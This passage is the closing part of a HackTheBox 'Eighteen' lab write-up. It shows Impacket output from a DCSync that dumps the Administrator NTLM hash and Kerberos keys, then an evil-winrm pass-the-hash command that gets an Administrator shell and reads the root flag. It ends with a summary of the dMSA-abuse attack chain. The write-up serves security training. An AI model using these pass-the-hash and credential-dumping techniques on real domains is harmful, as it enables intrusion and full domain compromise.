Impacket v0.13.0.dev0+20251002.113829.eaf2e556 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
[*] Kerberos keys grabbed
Administrator:0x14:977d41fb9cb35c5a28280a6458db3348ed1a14d09248918d182a9d3866809d7b
Administrator:0x13:5ebe190ad8b5efaaae5928226046dfc0
Administrator:aes256-cts-hmac-sha1-96:1acd569d364cbf11302bfe05a42c4fa5a7794bab212d0cda92afb586193eaeb2
Administrator:aes128-cts-hmac-sha1-96:7b6b4158f2b9356c021c2b35d000d55f
Administrator:0x17:0b133be956bfaddf9cea56701affddec
[*] Cleaning up...



Root Flag

With the Administrator NTLM hash, we pass-the-hash over WinRM to get a shell as Administrator:

$ evil-winrm -i 10.129.136.7 -u administrator -H 0b133be956bfaddf9cea56701affddec

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../desktop/root.txt
305caa3bf08f53f73ac8a821675e3a4a
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Conclusion

Eighteen was a great box showcasing the abuse of the new Delegated Managed Service Account (dMSA) feature in Windows Server 2025. The attack chain went from MSSQL credential reuse, through login impersonation and database enumeration, to hash cracking and password spraying for initial access. The privilege escalation leveraged the dMSA msDS-ManagedAccountPrecededByLink attribute to impersonate the Administrator and perform a DCSync, fully compromising the domain.

Hope you learned something new!

-0xkujen

  • Title: Hackthebox: Eighteen
  • Author: Foued SAIDI
  • Created at : 2026-04-12 21:54:29
  • Updated at : 2026-04-12 23:59:22
  • Link: https://kujen5.github.io/2026/04/12/Hackthebox-Eighteen/
  • License: This work is licensed under CC BY-NC-SA 4.0.